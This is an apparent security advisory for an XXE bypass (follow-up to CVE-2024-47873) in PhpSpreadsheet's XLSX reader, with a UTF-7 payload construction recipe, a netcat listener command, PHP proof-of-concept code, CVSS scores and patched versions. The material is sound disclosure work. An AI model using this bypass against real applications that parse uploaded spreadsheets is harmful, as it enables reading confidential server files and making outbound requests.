XXE in PHPSpreadsheet's XLSX reader

Description

Summary

The XmlScanner class has a scan method which should prevent XXE attacks.

However, we found another bypass than the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using a payload in the encoding UTF-7, and adding at end of the file a comment with the value encoding="UTF-8" with ", which is matched by the first regex, so that encoding='UTF-7' with single quotes ' in the XML header is not matched by the second regex:

 $patterns = [
            '/encoding\\s*=\\s*"([^"]*]?)"/',
            "/encoding\\s*=\\s*'([^']*?)'/",
        ];

A payload for the workbook.xml file can for example be created with CyberChef.
If you open an Excel file containing the payload from the link above stored in the workbook.xml file with PhpSpreadsheet, you will receive an HTTP request on 127.0.0.1:12345. You can test that an HTTP request is created by running the nc -nlvp 12345 command before opening the file containing the payload with PhpSpreadsheet.

To create the payload you need:
1. Create a file containing <?xml version = "1.0" encoding='UTF-7' in an XML file
2. Use the link attached above to create your XXE payload and add it to the XML file.
3. Add +ADw-+ACE---encoding="UTF-8"--+AD4- to the end of the XML file, which is matched by the first regex.

PoC

payload.xlsx

  • Create a new folder.
  • Run the composer require phpoffice/phpspreadsheet command in the new folder.
  • Create an index.php file in that folder with the following content:
<?php
require 'vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Xlsx;

$spreadsheet = new Spreadsheet();

$inputFileType = 'Xlsx';
$inputFileName = './payload.xlsx';

/**  Create a new Reader of the type defined in $inputFileType  **/
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);
/**  Advise the Reader that we only want to load cell data  **/
$reader->setReadDataOnly(true);

$worksheetData = $reader->listWorksheetInfo($inputFileName);

foreach ($worksheetData as $worksheet) {

$sheetName = $worksheet['worksheetName'];

echo "<h4>$sheetName</h4>";
/**  Load $inputFileName to a Spreadsheet Object  **/
$reader->setLoadSheetsOnly($sheetName);
$spreadsheet = $reader->load($inputFileName);

$worksheet = $spreadsheet->getActiveSheet();
print_r($worksheet->toArray());

}
  • Run the following command: php -S 127.0.0.1:8080
  • Add the payload.xlsx file in the folder and open <https://127.0.0.1:8080> in a browser. You will see an HTTP request on netcat <http://127.0.0.1:12345/ext.dtd>.

Impact

An attacker can bypass the sanitizer and achieve an XXE attack.

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2024-11-18 20:01:46 UTC
Updated
2025-03-06 18:22:22 UTC
GitHub reviewed
2024-11-18 20:01:46 UTC
NVD published
2024-11-18

EPSS Score

Score Percentile
0.17% 38.70%

CVSS Scores

Base score Version Severity Vector
7.5 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:N)
Data isn’t meaningfully altered or forged.
Availability (A:N)
Service keeps running; no real outage angle.

Identifiers

CWEs

CWE id Name
CWE-611 Improper Restriction of XML External Entity Reference

Credits

  • antoniospataro (reporter)
  • Antonio-R1 (reporter)

Affected packages (5)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
composer phpoffice/phpspreadsheet < 1.29.4 1.29.4
composer phpoffice/phpspreadsheet >= 2.0.0, < 2.1.3 2.1.3
composer phpoffice/phpspreadsheet >= 2.2.0, < 2.3.2 2.3.2
composer phpoffice/phpspreadsheet >= 3.3.0, < 3.4.0 3.4.0
composer phpoffice/phpexcel <= 1.8.2

References

cvelogic Threat Intelligence